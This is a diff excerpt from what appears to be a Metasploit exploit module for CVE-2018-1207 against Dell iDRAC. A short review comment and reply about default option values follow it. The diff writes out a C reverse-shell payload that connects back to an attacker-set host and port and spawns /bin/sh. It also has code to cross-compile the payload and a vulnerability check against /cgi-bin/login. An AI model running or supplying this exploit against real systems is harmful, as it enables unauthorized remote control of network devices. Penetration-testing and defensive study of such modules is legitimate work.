modules/exploits/linux/http/dell_idrac_upload_exec.rb

```diff
@@ -0,0 +1,192 @@
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1207'],
+          ['CVE', '2018-1207']
+        ],
+      'DefaultTarget' => 0))
+    register_options [
+      OptInt.new("TIMEOUT", [false, 'Override default timeout for reqeusts', 15]),
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+    ]
+  end
+
+  def write_payload(file, lhost, lport)
+    vprint_status "Writing #{file.path}"
+    data = <<~EOF
+      #include <stdlib.h>
+      #include <unistd.h>
+      #include <sys/socket.h>
+      #include <netinet/in.h>
+      #include <arpa/inet.h>
+      #include <unistd.h>
+      static void main(void) __attribute__((constructor));
+      static void main(void)
+      {
+        int pid = fork();
+        if(!pid) {
+          int sock = socket(AF_INET, SOCK_STREAM, 0);
+          struct sockaddr_in serv_addr = {0};
+          serv_addr.sin_family = AF_INET;
+          serv_addr.sin_port = htons(#{lport});
+          serv_addr.sin_addr.s_addr = inet_addr("#{lhost}");
+          connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
+          dup2(sock, 0);
+          dup2(sock, 1);
+          dup2(sock, 2);
+          execl("/bin/sh", "/bin/sh", NULL);
+        }
+      }
+    EOF
+    file.puts data
+  end
+
+  def compile(source_path, payload_path, gcc_args = '')
+    gcc_cmd = "sh4-linux-gnu-gcc-8 -shared -fPIC #{source_path} -o #{payload_path}"
+
+    unless gcc_args.to_s.blank?
+      gcc_cmd << " #{gcc_args}"
+    end
+
+    if `dpkg --get-selections | grep ^gcc-8-sh4-linux-gnu`.blank?
+      fail_with Failure::BadConfig, 'gcc-8-sh4-linux-gnu is not installed. Unable to compile.'
+    end
+
+    output = `#{gcc_cmd}`
+
+    if output.blank?
+      vprint_status "Compiled #{payload_path}"
+    else
+      vprint_status output
+    end
+
+  end
+
+  def check
+    uri = '/cgi-bin/login'
+    print_status("Sending request to https://#{rhost}#{uri}")
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => uri,
+        'vars_get' => {
+          'LD_DEBUG' => 'files'
+        }
+      },
+      datastore['TIMEOUT']
+    )
+
+    if res && res.body.to_s =~ /calling init:/
+      print_status('Valid response received...')
+      return CheckCode::Vulnerable
+    elsif res && res.code != 200
+      return CheckCode::Safe
+    elsif res
+      print_error("Unexpected reply from the target: #{res.code} #{res.message} #{res.body}")
+    else
+      print_error('No reply received from the target')
+    end
+    return CheckCode::Unknown
+  end
+
+  def exploit
+    unless check
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    lport = datastore['LPORT'] || 80
+    lhost = datastore['LHOST'] || '0.0.0.0'
```

Comment:
Don't do this. Set default values in `initialize`

Reply:
Dropped these lines. It's easier to just let the framework manage these.